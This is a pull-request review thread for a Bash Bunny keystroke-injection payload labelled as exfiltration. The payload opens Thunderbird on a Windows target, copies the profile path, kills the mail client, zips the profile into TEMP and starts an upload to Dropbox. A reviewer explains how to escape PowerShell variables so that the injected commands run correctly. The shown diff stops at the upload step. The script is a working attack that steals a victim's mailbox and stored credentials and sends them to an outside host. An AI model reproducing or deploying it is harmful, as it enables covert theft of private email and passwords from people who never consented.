payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt

```diff
@@ -0,0 +1,124 @@
+###############################################################
+#                                                             #
+# Title       : Save Your Thunderbird Settings via Dropbox    #
+# Author      : Aleff                                         #
+# Version     : 1.0                                           #
+# Category    : Exfiltration                                  #
+# Target      : Windows 10/11                                 #
+#                                                             #
+###############################################################
+
+ATTACKMODE HID
+
+# Variables Settings
+ARCHIVE_NAME="cache.zip"
+ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ=="
+DROPBOX_FOLDER_PATH="/"
+DROPBOX_CONST_LINK="https://content.dropboxapi.com/2/files/upload"
+
+# Opening Thunderbird settings
+QUACK DELAY 1500
+QUACK GUI r
+QUACK STRING thunderbird
+QUACK ENTER
+QUACK DELAY 1000
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK UPARROW
+QUACK UPARROW
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK UPARROW
+QUACK UPARROW
+QUACK UPARROW
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+
+# Inside the settings
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+
+# Inside The Profile Folder
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK CTRL c
+QUACK DELAY 500
+QUACK ALT F4
+QUACK DELAY 500
+
+# Powershell running...
+QUACK GUI r
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING cd $env:TEMP
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING Stop-Process -Name \"thunderbird\" -Force
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING Compress-Archive -LiteralPath 
+QUACK DELAY 500
+QUACK CTRL v
+QUACK DELAY 500
+QUACK STRING  -DestinationPath ./$ARCHIVE_NAME
+QUACK ENTER
+QUACK DELAY 1000
+
+# Exfiltration via Dropbox
+QUACK STRING $filePath = \"$env:TEMP/$ARCHIVE_NAME\"
```

Comment:
You forgot escapes around `$filePath` and `$env` you need to escape any variable that isnt defined. In this lines current state its going to result in the bunny injecting:
```
":TEMP/cache.zip"
```
You need to add separators to any variable thats not defined. `$filePath` and `$env` for example:
```
QUACK STRING "\$filePath = \"\$env:TEMP $ARCHIVE_NAME\""
```
this line results in the bunny injecting:

```
$filePath = "$env:TEMP cache.zip"
```

`STRING` behaves very similarly to `echo` anything you want to output as a string instead of a variable needs to be escaped properly otherwise it will be treated as a undefined variable. 

Please go through this script and add escapes.

Reply:
I'll do it

![](https://startupyard.com/wp-content/uploads/2017/04/f60db82acb9510030d2cf396c5bfa087_its-fine-the-anthem-of-meme-everything-is-fine-fire_1280-720.jpeg)

Reply:
Everything should be okay now @hak5peaks